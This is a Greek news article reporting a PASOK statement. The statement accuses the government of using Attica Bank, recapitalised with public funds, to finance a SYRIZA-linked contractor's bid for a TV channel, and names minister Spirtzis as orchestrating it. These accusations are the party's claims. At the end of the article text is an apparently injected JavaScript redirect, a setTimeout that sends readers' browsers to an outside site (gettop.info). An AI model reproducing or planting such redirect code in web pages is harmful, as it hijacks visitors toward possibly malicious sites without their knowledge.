ΠΑΣΟΚ για Τράπεζα Αττικής: Η ΣΥΡΙΖΑ BANK χρηματοδότησε το ΣΥΡΙΖΑ CHANNEL

0
2

 

 

Με σκληρή ανακοίνωσή του το ΠΑΣΟΚ αναφέρεται στην υπόθεση της Τράπεζας Αττικής κάνοντας λόγο για χρηματοδότηση από τη ΣΥΡΙΖΑ ΒΑΝΚ στο ΣΥΡΙΖΑ Channel με λεφτά φορολογουμένων.

Όπως γράφει χαρακτηριστικά η ανακοίνωση: «Η ΣΥΡΙΖΑ BANK χρηματοδότησε το ΣΥΡΙΖΑ CHANNEL με τα λεφτά των φορολογούμενων και των ασφαλισμένων. Ο ευνοούμενος εργολάβος του ΣΥΡΙΖΑ δανειοδοτείται προνομιακά από την Τράπεζα Αττικής και επιχειρεί με διάτρητο πόθεν έσχες να αποκτήσει και κανάλι. Το Υπουργείο Επικρατείας με την διορισμένη από αυτό Επιτροπή στον διαγωνισμό-παρωδία, σπεύδει να εγκρίνει το πόθεν έσχες με τα βοσκοτόπια χωρίς καν έλεγχο!!!», επισημαίνεται στην ανακοίνωση.

Και προστίθεται: «Η κυβέρνηση αφού χρησιμοποίησε τα χρήματα των φορολογουμένων -και με ζημία τους- χρηματοδοτώντας την ανακεφαλαιοποίηση της Τράπεζα Αττικής με δημόσιους οργανισμούς (π.χ. ΕΥΔΑΠ), τώρα δίνει μάχη για να ελέγξει την διοίκησή της. Ώστε να κουκουλώσει τα όσα έχουν γίνει και να χρησιμοποιήσει την Τράπεζα για ανάλογες δραστηριότητες. Το ?καθεστώς’ χρειάζεται και τη χρηματοδότησή του».

Στην ανακοίνωσή του το ΠΑΣΟΚ σημειώνει ότι γίνονται «όλα τα παραπάνω για την Τράπεζα, με ενορχήστρωση του πρώην προέδρου του ΤΕΕ και νυν Υπουργού Υποδομών κ. Σπίρτζη». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here